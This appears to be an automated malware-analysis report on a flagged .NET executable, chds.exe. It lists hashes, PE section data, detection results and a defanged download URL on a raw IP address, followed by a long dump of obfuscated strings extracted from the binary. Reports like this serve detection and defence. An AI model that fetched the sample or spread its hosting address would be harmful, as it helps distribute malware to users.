MalScore
100/100
chds.exe
| File details Download PDF Report | |
|---|---|
| File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
| File size: | 313.00 KB (320512 bytes) |
| Compile time: | 2018-03-21 23:45:10 |
| MD5: | fce344ec7f6879f961bca5c7b6a8d5aa |
| SHA1: | f317d9b628835cbea76e39071b7ff8114f7b94ae |
| SHA256: | bb6e552efc214121052b486702d03a09fe1cb4f1c2d2207d7ae0c033b2d4e443 |
| Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
| Sections 3 | .text��� .rsrc��� .reloc�� |
| Directories 3 | import resource relocation |
| First submission: | 2018-03-22 17:42:01 |
| Last submission: | 2018-03-22 17:42:01 |
| Filename detected: |
- chds.exe (1) |
| URL file hosting |
|---|
hXXp://31.220.40.22/~harryhua/coco/chds.exe |
| Antivirus Report | |||
|---|---|---|---|
| Report Date | Detection Ratio | Permalink | Update |
| 2018-03-22 16:36:15 | [26/66] | |
|
| PE Sections 3 suspicious | |||||
|---|---|---|---|---|---|
| Name | VAddress | VSize | Size | MD5 | SHA1 |
| .text��� | 0x2000 | 0x4cd64 | 314880 | 2290eb9f207ced37375056b5092a7727 | e33807c7b208135c1c8859bb5a901c186e24a5ee |
| .rsrc��� | 0x50000 | 0x1000 | 4096 | b0dcdc0851991e1c199fafc4ad09858a | ddd025ed86b6d69437485140628a46eb52d57be8 |
| .reloc�� | 0x52000 | 0xc | 512 | fdb7f98fbd0d8d381ddf29ecb8df17e4 | f4f9adf84e76701aa8d34350797b89ed436d7169 |
| PE Resources | |||||
|---|---|---|---|---|---|
| Name | Offset | Size | Language | Sublanguage | Data |
| RT_VERSION | 0x50058 | 572 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
- API Alert
- Anti Debug
| Meta Info | |
|---|---|
| LegalCopyright: | |
| Assembly Version: | 0.0.0.0 |
| InternalName: | chds.exe |
| FileVersion: | 0.0.0.0 |
| FileDescription: | |
| Translation: | 0x0000 0x04b0 |
| OriginalFilename: | chds.exe |
| ProductVersion: | 0.0.0.0 |
| XOR | |
|---|---|
| No XOR informations found in this file. | |
| Signature | |
|---|---|
| This file isn't digitally signed | |
| Packer(s) | |
|---|---|
| Microsoft Visual C# / Basic .NET | |
| Microsoft Visual Studio .NET | |
| .NET executable | |
| Microsoft Visual C# v7.0 / Basic .NET | |
| File found | |
|---|---|
| FIle type: Library | |
| mscoree.dll | |
| IP Found | |
|---|---|
| No IP detected | |
| URL(s) | |
|---|---|
| No URL found | |
System.String[]
GetProperty
1WemO0exyVfmLpDHjYGoQ7qz
VsaytiNxzJsFBYS5UkUyVcTc
FGEoP5HDd0UqAYZjc2yiEu1dRA5dLfL
VarFileInfo
FileDescription
chds.exe
kBMhxHzc7UmxyiamHvd3F48aQHPfxSDs6qCw4S
ProductVersion
GetValue
System.Object[]
a8W8EKndjVQyM8VtuM0nzGP4mjHPNVFpj10vEg5
StringFileInfo
1wc3fnlvoTrkBdFBq1sZN
OriginalFilename
parameters
w1kZGLZjYFDbdronijXOxfWjbhelGKvh7D1
index
PikClDZLHhKW85mLQoMm44oT
System.Array
9hzBkiMoGFqbkwxHk4YOkzb8o6
FileVersion
75gk0RbGw5XvHm4UnIPdwMnRokr7omD
0.0.0.0
ToString
CEqdUWtArJJ921J5Zin0H6rukb6Ln09VFHwI
iyG8VmzmNNxr1lk9mScCZ2I
Mzm5dLWQuaduP2FVS6upc7y7as1p4
CxUixnoyRNPY90NdzR1PVqi
In9f1OTkR8oaTd7cWlFKNSdjqoTu
Tx6kqYxBPAhsCoRPc0KyrBV6TPxftN3Q6PrZ
Translation
zuTDyqkZW0BdqBWJfsJySHpRURZ6Pp0r2d
qHPjxwCVd0m6dQNExDHZU8LGb9Na20sLC
Assembly Version
4hWpQlr62wO2ekR07x75GYOiICpPmmZSy2Wm8
System.Object
System.Text.StringBuilder
VS_VERSION_INFO
System.Reflection.MethodInfo
InternalName
CreateInstance
HJCVqmqPRfNtKlj7vbLUpw643xfA4cGJakCoJO
bKMxHe5jkLgWiKg1K9Gja
System.Reflection.PropertInfo
Length
System.Activator
nHfDwkvmPdw5mf3GVqJqfj
GetMethod
Invoke
ddK3cdMoK5qitbyIbSohjm5PrfI
ele2SpPbTTSaPziyVVJIq
w1KXgtsrKEAFaH5sT4Xmoh1AnifGBLq3o8
So8w31iGx7bj26XA5eVc9CrPzKpJg
types
LegalCopyright
mJqi8ygpXgpFsdRlvNGMH
SetValue
obj
name
QnuYXJMgdt8RlIGQWGfPqtYrZYVupVb7uj2`
GetType
C2n3IhlIdzVAHcxexWCcHrfw4YtmKqbw
000004b0
value
E1VJhVc9IyloJ9dngk4LbkJ
WJMMgwmn28XfKPmM7m2Isnnsi2CW
oIVjH99R39iED24aAy6rMY1mtCctTLOE2nOlOmb
System.Type
Append
hZ6ZZ0lkU44RBqhCFY03HdmHiOi4QUij
zvHWC
Rqg#
Z$G4z6
p9D
=6k4
kE\=
j#Y9
c5|1
+P v\
,F^a
< [CV ,
ipZf
t H;|
:DXnx
5RsX
&u<d
Int32
-PiF
x.h
r%MW
?>z-
tlBO
>M`q{NRd
ao:j
"f1n
zPYV
LjE]\>
m ;Y
LFry
H'KTd
v1\.
A}Eywq
[dR~I
/gKuY>
=MHf0
-3]TP
{_h)El
x8aCF
tw6v
a[z+
|G}5
e&~5U
<Uet
")|T
TvG*
XB^b
\d[@{g
8U{a
+XF""
nyp{
o".?UKbMtU
nX ]
})46
[p,}
|)cm<l^E
<mQa8no
(%!&
vq$PP
J9F_
uQUg4qBP
Ku>K
Ea O
DKFp
[?m?
QUiZ
q l7
mV|<
r^tX
WO:t
wl{5e
+qGc
r* 4
rG
*bNHQ
MEuzE
$ g
N9dO
0)zj
DT\Le
cu3T
:7WQ9
J6b>
vK^w8
=Y:,
$*r
Cr'{
Q}X,
O/o?
or$"Uo
:Jcc
!H{!
OUeA
T"x37
xo8`"
t=m}
\~7
:n
tjL:
wg>e;
'\r`/
G+Z Q
`v,l
IThcC7
tGU.
%zeG( >(q=
zxx,j
q 1k
\_j
\UHU
a"Fz
/%l
= p"P_
ce'W
a_ U
]| Z
T/#6
M'l>
B Rs
E%`-0
SE@Hz
:h,J.WR8
9-i,m-
,8vE
52;8
U_
[K,W
%oRM
kB G
G+"_ /
System.Security
Y+Q:
?[;E!>0G
:6S/,
lVbm
l,C#
`k8(4
?euj
c'od
K5vF
iN \
!qHPjxwCVd0m6dQNExDHZU8LGb9Na20sLC
B(-A
>GZ!
u.Pi
\b|x
LYVBV~
eRf]
,\ L
[D=o
iX$2
y2-F
uKCq
\;_!
Wxn<
Zj )
Tf.'
,}z
}~@(
f9-YL
_^ 6
oniE
(h^xUK
0-2N
)y}3
%Ubr@
C]/t
pZY[
4{Ku
trX>
"\H{
KH(0
'qrJo)
5ie
$${W*
1+C(G
,*;:'
x@64
94=+
{9([L]
^chd\
`X Vp
)"vR
fVN@
11$9
N L
D&!jE
~6]Fmq#v;
'u8l-!f
y_HP
?W'*LEq
k/tu
YyYy
'/q
bgaV
czx 2
C2 43
)wh F?
@Y=B[
h5de~
S}vPt.
&Rk)X
h}'`C 8
3ML$
ibv$
&38ocb
"XPq<
G42n
! Q'
%h V
#y q
$N8
ulC5
I{PJ
&&+`
GXd/
pSf$
p0Cln
m;sW
X'T(
fC2o3j
]Zr`3
#$Q
[9J|
YU#
+z/B@n
x{eg
"7s`z
}]]p7
Gp["
D4P]'
*-=yX
1 v!)
}QRm
;E60
HN8',-
b/agL
Bb32[
v2.0.50727
Oa!. 3y
Dq'LV_ 7
V{vQ2
sJi,(
pop|
V]-R(
'a8W8EKndjVQyM8VtuM0nzGP4mjHPNVFpj10vEg5
,b\'
Vi7L
P)=@yv
A;gG
>T:$
^JM&
60wt
F-#*
q&C(
6W) v
/^1(
GB<|>
& ~c
fp:!T"
N|O~
.FLv+
ijyrsf
=\jvvw,
y"K<
$H|=
QM -
Q{9j
3kyyt
~p=<
k!zY
$CEqdUWtArJJ921J5Zin0H6rukb6Ln09VFHwI
=\ Fq
h} KXg
4<9LU
O97J
Z/s,2i
tXae=
\&-1
Pn@{
<Y:qA
;pNQ
WAc@Sk
- zTX>E
Fs,]
UnverifiableCodeAttribute
WNQ#
Q<+n
"/ik
HS'm
-Pc#]e/R
!MW.
|+O
HE[N
i[$ e
U#&.(
4tB
O8\d
:X#+
9FD!C*[
$xr!
v.;P,
v~AC
/3|5
h9 I
pc^h
'% cE
T2)BF
j^.!
?. LL
qi4W
#Blob
mSSCN
B|x6|
Q01
h60/=
=kr~
3)S@0
7-0L
!( Uv
I3#+
s1@T
D;J ;
ZN \N
Nmeo
CC^y
kSVd
Ze/
b6M0S
&|Ii
V7Lz
0+ylQ
Gfc c
* %'
A/SO
T;8
@fQ<b
B3TK(
@\6Swm-
x5G
0lD\z
Type
*]oI
J,B4=
RuntimeTypeHandle
q#QJ:
rWRR
ol@
9&Hcf
=V/(
J\N5)
Q?NH
O&-}
6wdd
i?ez4
Ljuj
=Qm-
KgjqK3
Hz0;
/2PK_
oTxNk
,D&
;^8_@D
N2nq
@+fH;
bZ([
`_Mv
,mj9
VA
_CEI
EY\O
&f2
Q /&
]*Jj
A xy
RLe03OfCjp9xjV9Sw2QBmq.resources
6T/C
Ww:a
vDy
tP[E
MQ=5
aDI!W
Z6~h
,o5g
2@bP
;!z>B
{4o/
0>:
\ lZ
P#>,
3~s(
#E60%V
8rSR
D-B#
Ve u
C{9o*
txQ2
z?<b
LateGet
frlOt)
~t"8.
qE :
I+u/
X^|
B&BW
E,C%
3B/ma
}eP-
6)H}Z
!zy<
`{l\
RIs!U
Ez
1*9
j!Z$
;`,\q
?RrWC
5X2$jt
%=G,
NB
xnQ2
Ft})
chds
wlW$
U.Ki
b8K$!
/[ W
P`:P
y)#g
/%3(
~F5$z$
BJ4e
KQ0w
6iX{
>}%>Y
q+29w
r6=K
NFVkA`
t+!8e/
1@3[
,UFG
c[~]
=S{b
t&wj
=Hfr
FvNe!V
C_#<t
a,a)A
6qjL
10tg
b8fL
: Iv(}TR|
Sn;
k%d5:
>hB`j&
db23
~Cc`
T BnyqK
M]4
6vl mGS
CbaJ3
fyj.
Exception
yo&
v5Y
u \7
g?*'S
BtRT#
4#`Qs>
|VGQ[j|
O/Hs
.text
+IDY=
4* \
O-jJ
tnQ4
YXA
Py"2N.
dfMU
{=-C
A);L
QFrVD
P6"e/
CbF
gcON[[
yK*/
zYVf
,^TH
9{Hi-}!
\).
k_= a|
t[>$
jJ|p}
e+G,
>xE-c
GP<gC:?
cBT t
' Tn-
vX<|
b ~1r
/sAn
,Z9}%
v^
]N[pe
L'C
[|+#
/0I@N
'#-,@
IX%i
?;Ej
j-\G
Q0J*Roh
msXO|
mHO
6KGC
:F"=
* LC
2]#60
}k,Q
]mA_
<39A
;'4%
< fr;u
R%:_
%lsb
D1ELB
arpF
Q}:x
w|]yz
_vUR
f##g
A9g+DT
+_`<
qp
&G6L{
O:0$Oa
`>H,
\}gO
1h,s
A5~cT7
fSW=
XMw@[
'U(q
"v}'~T
-3]n
+!hp
Tu Y
=-cUAL
3{
C5 ]
b}c&
Nwyx
nO,Z
d!c0
%%y|
W'E,
.AO
h'|#
yF(k1
at J
]EB
LpsHh
~M-FD @
'3)U%
*|yv
]t
`QC&
qI2e)lk;
(D^c
bA a
[J |9dt
}}hz
8G#~31
(&zFh
<ToM5
]HAJ}
="B
le{0
`.rsrc
M;'eL
1Y|R
`KuGg
cq8!
<|7s
j:b3
O5 t
?4N:
43I|V
(65Q
j6 mf
N5I#Z
QU7xw
|glk
uqJz
' hbg_
]U>6
i\]"
XUIA
yNuKj
'$LU\
nFjL
5-N
.ctor
StU|
zk[
J9g,
j$x("
w1?R
Q)z$
M\9V
x"nV
T<Ne
)tc
<*C_
YjRE
+l
7?A}
tcn%
KCF~
i'.q
*]@
Fx.Si
t?a"O
% ek
p d}k
_JyW
BiTc
(pf-
z)sA
0S=`
UASF
`Q,CE
4f_,
J/79
H^ &n
S6Q3
q] !
2Q{nn
$E9
v)Z512<
. i<
,R:.
Lb`
]4$1
8TOv
& Pb
y$E%
v> P4!?z
`n @/`K
e.6#m
r3=w
G`Td(
? h(%zF
ghb?
Wr,8
Q*one
ujaR
^]_eY
*YYs
k!JI
M-\w
?*S# '| }6
4nG21
7>8G
M5*j
vT$-
*o{TFlTj
!MH?
ksl y;K
ey):
LyPAm5
+%t
3TibV
*7TuE1r^
q3RU
wbzC
/gUr
7z`"2
}?0-
=\qX
rv&19
#Tv=h
+,|ctbO
-\W
#QnuYXJMgdt8RlIGQWGfPqtYrZYVupVb7uj2
N =}
MLWd
S`R
#:;'
FCPu
dj|j
^^?nJ
22[>3
P@[+u
?jzF
y { Z
@@H H
dF| na
C^mDK
WTS[
)``H^
dLN{+
hr"X:PvC)
3n'B
( CY
eT s
ngVi
2<RLW
0: ^
/O`E/
RXyI
%!'p
}t&\
GfSX
]hk =
4m`
oi75
vHGN
C,dXK%?SoZ
g yV
_ <_` _
08w9Q
A?FN
) '|:`)T
-l2 B
CJT~
^^Q=
H0[70
V4=(
v"he iO
8A!Fn
chY}
2s,5
5Mr_E
c+[/
J qzM5
O%Se
D)[=e
Y^>C
6f?X
z z;
mscoree.dll
15C[
>dy=3
?"m_
C r8
y5g>
(hci
v|[
_Dl
[+abIFgz
Wv
[RqFk
&)Z?
kpPV
h|dlf
z$`$L%
e}0u
{GCC
f[1|
^Ur?
{u.E
{hX15
6D\5L|
k!&=
WrapNonExceptionThrows
3223
nf1*
'q{Hm o
P fLHN
Y;d%j1
SwCH
aY\
BhV8z
R\"m
L!~
)tT,
hY%P
e;G|c
YW8dI
~\ 9
'@FB
B4,{
i3/2
6hiu
/&}
RgKI<C
( NR
={vh
dDnh
T15.
8LOFU
xtxqD
nu.>Vm
i oe
GH 6
kN1w
Y4#v
rHx2T
%N][f_f
mt=[
ybH~$
p7#m?
B4,R
%(S/
!6~}
4I{5
R?kh
\`oB)
*>`Sc
_O$r\_8\
DialogResult
=Rzi@
C4^w
[lVn
PueaR
M-e~
"cjg
Se4!H
Tr#F+
H'P03
G?_s
[Hiw
{0&
j"Mk
!2hN
iK3p
=mZb
$Pc!
)2 {T-
hV%2
.bCQ
b\E-
SnKG
f4GP
wNeY?
H}H
vwe}.
'a
4k u
,qNA
pPY8
M Kb
&?_nn
Lkz{
iO2-M
#u>+
\XK+H
:: [
CW_
:+-%
A@0%
K:86
W5&R
A`"g
H^rKi
6t-Y
9MFKl%
u:"p
~#|u
Vojb}
(J0n
+ J+
xO_o-
fnt8
.^`M
GIy#
0#<_
VJ^2
u)K\A
AE [B<
/_C Kl
I:xf
tG`#
tU}sp
EQL1
+]-C!4
w0|UR.
\0X$
.>^(:
CW-!
'R>d
=BfA1
DN-|be1kO
(O=
G#;G
e85'
~ SD
P73rK
]WYyK/
l(}9
QG.Ne
en'r
UAFH-
><T )
.X&Nog
#Strings
DQ +
;a[H|
P^GG
U-KX
1MJm?
NBn(
?};Ly<4)H@>
F`MP4
3;h_)
o~B'#
4s;S
~[K!x
yd9O
^7
akQe
nkud/j
qpIZd%
gM2u54
<x[Yj
^lRO8m
[ O?Rx
+XAS
!1iS
|Uy'
95s'("
UcxC
OXZR
#a
RCHN=
GSF"
E0D@
)QcwM]
)+vK
}zWq<
o K5,eA
[1-C
s:~e
\\sC
--K3
kL_3~
0}
90e5
2v' `x@koM
_khk
hxjH
sN6.
(~+[
OTz!hB
0M0H
_}1@
)h f
)#fN
fG6ZrVi
#1ASiBw
_]bnk
JPm*>
Wqat
# T[
.>_F
MJVy
System
s \ x8e
C&z5
tl'
14Tq
_v*]
S= erz0
xol+J
7~VM
PgR{
iMn{G
Ml3yM
z#`v
`;E>
*=!d8
*^x Z
e^+\
"/}G
!<lH!
05\j
8!6<
q#=?
wC%Typ
nWtn
SP_)
Ct#~
~Z ,
,u6!
MH|:L(
#E%k
6. PTI
>=S
*6u'=
TF+X
.>;%
P^ {
FYjY4
3N&7
^v{
CR{l
v/K]
A53i
tF<
Yx&
`YO
lQ!{@
",XH/
?V>
P:V:
wl|!d L1+
6K7H
PJ5
s1 7
U<&N
cF-OY 6x
oRi"
-V^w
]]ywk}>)w
Rd!7
b8C"
x3v.)
v(Z7
(T{{
ZJF^
k0 +
.;jT
)L J
CwWir6iz .z
#_W
c 0
gOHc
(EI-X
!*K*nB
@#W
JB^G
biA! &cg^5
g)
C6c}W
L$5s
;03VE()
"XQn
v!5)Q
Y%S}
U; Q
% G|Of
2Y?q
Xs7(
RvWj
Lfq&
5 B`Z
]y?R
SJ)ja
HgQ
$iz u
Q ~-*;=
ziXs
DU{
v`"{
\z P
f[9
dr<u
>|aA
E!A:
f@I9
\Y0l%
H6e3N
;%
3YZ#
Ai#u
E0P[
9j{Y:
YL^:
i.5+
La?}p
w>^p !
qI[w=7Q
W>buW
xJQw"/ d
97lQ
.'U
$6"Nx
MN8%yp
Q4~!,
8H;#
Q3g6
l($r,
0 `4}
%FN<D*K
X)Ao
lI?B
e$5k
x Sl
DTpz
8xG6
hOqm
ni_7^
MW:F7
9^FS
[3K:,
YYRM
goH(/%
es0q
GGmv
I#IDT
$) m
VT=N4
#fxP
5+y;,Ec
6xioc
M`dba
`IrK
g;j~
.Fwn{
Y @L
-Lq
C0C[,
Vi~y
dFYgs
x64
$6ob
GgF2
Otw7
!7Jn
&X][!<
I,Cf?A
Hu%-
kbsZ
X8
3~Py
Riv0E
.AQC
Dp,x
Qnd@
kc`U>:i
M4^K]
6~+G0
WSl+
QHi$
G\@bu
egtl
Vz[N.
mK5;/S
Omr
19$T
po<- V2
>xwo
}|g"O!
m88L_ ]
.[QJ~
wW 3v_
FU*+
%zT_\
?&pc
vA!Y
S9 d
;A)#
7egL#
\MtXz
Yc]U:
.>N&
y+q`I
|chU
gF B
ht.>%
:ESZ]
p|
Cewx
FNB4
'>qO
a3~J
uMO C
KFB
2 "Hh
h R"
AX;F
[;Qx
l ~HqRI+
0p=-
12=j
+_@V8
L7Pzd_O
BM~{hs
w#rL\
UC"c
~mQ
aBeQ
=Gww
pxr&2r7
)mUT
~UC
yyAv
,vu5
B5:6
Uwd5
_BT?
,:=w
Uebi
pV>*
9rTu
*;m
k0v{I
ParamArrayAttribute
%7ht
Xo"w
lFqv
)F/:j
aVR1 TP
@RW[
p 3M
|*)_v K
|!u#g7
" 7-
5 W[1
Ao[9e
`m_G>(
5ld$#Fzb
m@-c
x hg
q`g5)X
o{h
Y KCJ
Poq$
&*9w2
x`;K:u{
>$xM
M&bP")k
IhL
HUg~U&v
Vp\WPT
U]1;J
;FRfXo
D%a3
\./=
)~`6
9>?z
d0x3a
h^M;
?E#f
,6=@
3okoXw0
"'zn
l/<z
p_R-j
Sd*<
58C4
j9A{
=<n?'
bAXU
_"@(
*wyi`{
XU0n
nt P}
*&~`%
Hb&Ai
O EJ
N$^yA
<) s
V+#5/
ZT! 2
X6R
laf,
x2k]
\LZ;
<ewU5>3
=%>f
rtqAr
@=,w
/THOzzK
[*&H8
~>JT
->b[
Py,d
B'Ba
Pp+d
*P"5
0L[XV
L &w
7QN#
pN>g
C7)(g
^E(`j
(A e{
uF(;
CgBV6
)zM2"#
Qx'J
&,VoVh;UK
G\'K
]2g`
;/QO
#}wB
'Sa1q
A}wrFw<
f x
bs#$
!5X^f- 2!
!F O
bF)#
\cr<
G,pz
yp0'I
CtlW
'rv~+
'GWC
?]I9
bw)B
1 'z
yP7;
nR.n
9G[J
L8g3
,$I(
XBrgt
l#vV
vsq)U
Rc :=G
3,s`
A{ Fi
&HJCVqmqPRfNtKlj7vbLUpw643xfA4cGJakCoJO
&i4T*m\
:zAC
/$?{
-V&3[jcR`
))WS
p*>+
:YJ4
tQ#-36
LSLu*
QHV7
4\[R
#_Tm
yQc35
@6uL
urDB
WH?]
C\2Ym
.= W
5g#0
Mv*W
w 7*
hUw g
bx^r
(!yL
k?W\
.=/?
mmqO
@x<N@"@
np{*
}4;9
m'%Nk
@c'`5
48'
U.L2Y
IE
"w&!H
p0!2
ZKvY
#J&4
f3UG3
CEzG
Kl3E
G@uxt
z~T{xv
fa#L
;*okZ
B O:>
ijLJ[+f|
D;z
BlUK
>vv1
P-;T
N)I79
>kE~
?!Wsr
xf\
p:A$
,H+7
=O'n
C@h X
r2_6mC
kp^R
$&tkP
v=GLBa
X^~\
,-X@
oMJ5
eqU_
&]H. <0c
*Cms
; Yu
=V<S
/{c8
lnE5
CU{ a$
0- k8l
JPV6
eYX~
yg#n
BEoT
k ]B
uyo>,
$ .3F
T>C$Q
u//;
}7 U2
[$:Q
raeZ
fIY\
/LRF f
ssXP
}ZZ4
NE`*
:!be`
L$`L
z~Pw
rz][D$
PAk[
3ITS
:g?#W
<D<@
F JG
.r:3'x
>h(1gX
x{k>
w Gi"cS.
@L9>
,;N
C7 7
e&?-
Xov^
241`
!ZHz
gl?7
"4GJ
yC+/&
^CR-
~H5v
!TLZ
84%0
}wB*
Tk )8-
wS5F
% KB
eTc2&
V=Y
z.f#h
7 5!
>?ZL
5nZR
obN7
LateBinding
, {R
Y$]4
r=0K3v
S,xF?
SkipVerification
BEIe
DdYtj
<k)
|xWN
SAS#
c}N?GuS
ohFe
m !YklKF;Jd
rl
$WU6
~1^X
#Lq
:`+a
FoT<
,HW5
/Mhc8
mtb[
!or6
nSM'
y($!J\
1m&m
> Qw
v'c)u
w * n
~KR on
MW?
7KD 8
c#ewpTgp+xv
yjCN
NTbD
QgY;
']rK
^-lO*
cy*^
,iH<
5Jb`H
`LT.
O< v
a9X:{"
a2*KZ
>#Az
pEb7
inn
(u $
W^YI
8[=D
P"y{|G-h
#4+-
9~ys{
'b_y
mMX"
vRnK
2Gdw
[.:f
:|^z;
'c]-
% +I
b(TLZ{utE
hUY0F
1Su_
1 r/
iE0"y
$gCl%
7~d+H
@+\q
BP9Ug
e *#
C0rA
q2Pr0^~z
1_b'
hP:&
rr/|G
&f<Z
G +}
}t)&
-U nc
L%yCFc
<=L}
X@8N
!i/z
a q\
B5DZi:X
8VFA
C%;zo0K
E|H(
6IFf
3 uwV
Ck9e
SCIO
Dy|^J^
? 3elL
Bmgk
<G P
+#+g
cm]a
hyg*
@.reloc
T |@
i0gG
jvq
HYs8dQ
:V<Q
n|8]
X:cm
|@:o
3"jO
TF)O
2b Q
<n ,
wWaAM
?Z6 {u
%Y*{
Uo5
R920n
1JXlL1
,AGl
Qgk3
{fL(*
0'q+
&ym3d
(tq%z!
OI,8
27X{r=
om] B
La-a
k&JZ4
-Uip!
'eu
!";$
36ZM
-{t&
%zb+>
i|
7;0EGM e(
[#@+*
du<t
o[i\
pC~
` t<
8BJfq
DNeX
vPWa}
nx"]c
~) MY
:?(P
BZFOK
w:Q%
$({s.
~II4
?#zH
2-}O
k-x$
End9
>"K|I
1Rb]F
@)t1x
lCpQ
Xrm3
r+C'
-9Ym
=cDKJu!
GetType
9)W~
br3F
*yVJ
< VN
lR};
`" x!a
F,v1~T
xFxp
58xu
)i!V
;_WI
8- \ x/
h}<>
bAtYk
Z3-(
/I $BC
Itin
(]&y
wY[V3
Em&D
m_v{r
>'~R
^lDX
c_fg
:?h9
E|1/
o0\]>
N;?g:
29II~
VV*<
#/@m
^'Q<S
c)bZY
=FhK
oue\
0h9w
.'Sy
4Vc]9
N(E[onk
o2628
pA'>
`@53&
@Fq!
\Exk
D9S0
,=M%
p?5x
c%Dt q
PKjN
U ~ B
B;O
4aa_Cj
]f&y
k+9rj`
LQ x p
P~ '
hwk1
"`6
W5@H
;cv.
m1^6d
l'yX
IE.v
1!'P|
[ ;=}
E1VJhVc9IyloJ9dngk4LbkJ
t\B@C@
Fe&Y
Y{ l
!W&<
_V> 5
J)xW
~diX
Y"Jdg
e6UV
P3}R
S@%%
| ,hp
GVo8
F*.)jTV=;
RuntimeCompatibilityAttribute
zT5
y+MW@
% R,
u m-
hO0`
zj*k
:h:"
@lV6a
G}3
=7W+T
OeV
/boBs3
^;uE:
00} _r
1wc3fnlvoTrkBdFBq1sZN
_gs|
YWGM
?Z2`
g)/G
bDV
J2_
Microsoft.VisualBasic.CompilerServices
E+sFU2
\h>`
]6O;
(>;MI;
wu`%G
+3=;
+Cl=ft
*5e!m7b!
T7:V
&bw(q
NvPM
":NM
MoW]]
Nu [7
^npJ
b]1f
!dE$
A92%.
I#@,l
\&!7
oHbT
]`
27yP
nec;
|[l*q%
`]Q
iQ+_
)9 8=
Wf>g
i!O+
P:vu<
T#Bf_
QK9
M="L
MxFe
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
mt>D
-}')
7JlQ
5s(W(
x?lE
N`H{
t#hE
Z a
) =ar
"%/p
q7Fp
bWV7&
,~&@@
G4n-
M)jkrP
&W^c
/E'o
b5!u*
BzVg
(-O._
<l eS>
iCU
!nIac
<}k|
7WmTC
#w1kZGLZjYFDbdronijXOxfWjbhelGKvh7D1
/*fV
tn7
>+4.[
TL5X
; d
QPnd
MessageBox
T"QZS
JjQ-&^yYh
6-dc
U aEAM0
+/5}{
EV$|
gJ1
r,OLJ
N@{
V>E6
X6(nE
CHI8|
B+sz
b_Em
7,&~
?u*@B\
1Ja4y
UjbL[
(i'%
PF>0
'wC-
^y*e
qFFF
a[+!
*
i>
%c!vhzm
tm8q
:n{,+
{M#8~<I
no(.
^%~P"=
venu
8f`,
$UN
/q ~
}>f$N*
P:0E
x#}t
>Wo2B
@):1
Lh9egt9<
<$`,
/[5oa
x9/eF G
Q_e< b
h< 1_1
j&>b
Y2"D
B'@1
3<B^
p#"k
?On\
}@xq
RCI>U
c |r A
d:d^
Lm k
G o<
,l{!
#DA
iFK2'
f]|&
;>$j
kHq
r;kw
Xsdg6
9 $z
8M
Ta#j ~
)wUh
Ul=I
3DQ`Q
9NrXCH
?Aw}
\|9+{
5 \.
Ro^#C,v
?<%s
<mhe/
C2n3IhlIdzVAHcxexWCcHrfw4YtmKqbw
o!Ys9
Q6IG
\%QP
0&nJ\
xo>F4Uk
eX^L
crL
luX?
#v|F
aH`0"9
wFT^^
a"HD
(${z
)\6i
k1^[
8/gu
;mmItZ
[Dg+
6++9
D6PP
GK2A
? %V
z{}p
[ >b
Vc4R
rF J
u<t/
XgeH?
| 5
R36o
dY;k
>BkI
Ec{ P
q'w
_|.i
Pi\L
2b6.:
YIidF`
5 C21RZ
CPH^
_a%c
jC4| sv
hVuc
74^F8"
K==e
~*#{b
^*>nqA]a^
g/$R'
Tj iS>_
y{c9j
tEIs
+{V_
MF]Q0
>-e M
\ @'
xp5yW
@sr|
L CU
C-]j
Tv D}
#_Zi
x8$,3
3^]=
k >jb:
UO9KkO7
}.E#
p0p)
WI/@
)YFq
,q|;
(%*n
</jT
M5$V
Nv S3
H+7f
m9E'
VzLln
cK{zxV
(3(0
0r g
BH+5
x_S#)L
HJ/d
l1wD
i|d.
)#O+
K8Z2E
V i6
n0puwV
h+z&
vWr
HCs#
2[='
=3*2
@`(W
7N(T
Tw<\
0B%/
K@:a
rDI/
IC1x
/#}y
M"
}RPb
blG}b
r5 HFJN s
*=w 4
} JXe
a.D'K
.Xw,/
QxbY]
d oI
~ jm-
}D, la"
!5\q
M?/Zx
$B4
>AZ1
V3[$
1^%y
8Pt F+
lYPQ
h[gvS
System.Windows.Forms
PQ[*
KMDM
H,Zr?
8&Zb\
XC@P(D
"(lD
UjA+
%-40
cbc
AR^Y
A61A
X0,\
So8w31iGx7bj26XA5eVc9CrPzKpJg
&(.:
P{^\6
2rG*'
uB-TeC
17X>
Fy SKcv
M:qE{t
t%]
U3~e
v,yv
h2~<
'<1I
k0Z+
v,t`
)(6_
x!/q
w!Vr
yP,
#\$
J6 jxM
P<Fc
w=sp
"MM'
k 1R|
smb
CFE7
DL= Ms6\
[0Ot8
0Pfd
! 13
CtXg
R[|c
96f4L
%S(zB6y m
j_*1
DBS_
64SU
2a&n
Nhzc
Pa~D
Yn*~~
j!'Q-*
RETJAWj4r
b> ^p
Gf51
iyG8VmzmNNxr1lk9mScCZ2I
QEVAa
P.#fvC
0s,;I$!
P/`/5
?ym->nd@
XUFs8/[
G,&c
/n BR.
'@>oY2
cwZB
Mx|-.,y
6;V&
K( c,
j<gE
HZ:|
_ zm
\_sP||
\Vrr)>
D$`X
841>
"('t
ugb>
f#sZ
QYt$N
FcS<a
-;7i
aK`)
#gID
aK!h
deRrG8r;?
f`]r3
%0(tn"AkE1`
*i XVw
t Mn
9fccUxlH
"a7CA
Q![u
vwnEP
U'Gko
4`3NkQ
8 !(
ki$+
k{C?
W+ve
p[6\nEx
]/I$
CRf
vlT32
pSn
+ky|"_u
Va/Y#\[
8+!aY
g)4|
FN H
Iv#}k
NCAu
n !E
Ei?bi
sPk -
dE@]
FE6t
88x Y
"*X;
rLad
m=O:
VZ5C
ZrF#k
J<G'{
%x+z
PMwZ
~f<5
;~i0
(3C(
B4)) J.j
Cm!\
59Tv
}/3U
8>+<
2dk5
l+O
3 + ?
S5;I
Rb)*
3,)u
yh]f80
cPV%
?,;9z
u>>M
e8Uk
RUWV
('l6
&-Sn+
5?_au
0g` q
l\X\
iILc
+:d<&
*$-K e
J|o5^V
?I,)
1Zib
v\=9
R[!PMn
HT&u
O @]e(
% I^
gM N
"k[N
x{_c
he m]
=Hn|
d! n
FX :
EmNw-
0v5D
&(}ZC_
U;GgFV
P&;:?
6Rp=TD
L~4f
7cqkECT
mCSE|
_.gu
-TRW
('X
%Fu8
!y_
o9GMI
.s\8
:B 6
UEpC
zh^~
sOxK
>qsP
2S>@g
s)$=
=Xf"K
)Vm%<
}R1;
6m^1
[xQin
u17B
vl_-
aCp@,;
Lh,&
0[m\
zLWj
>BTe]
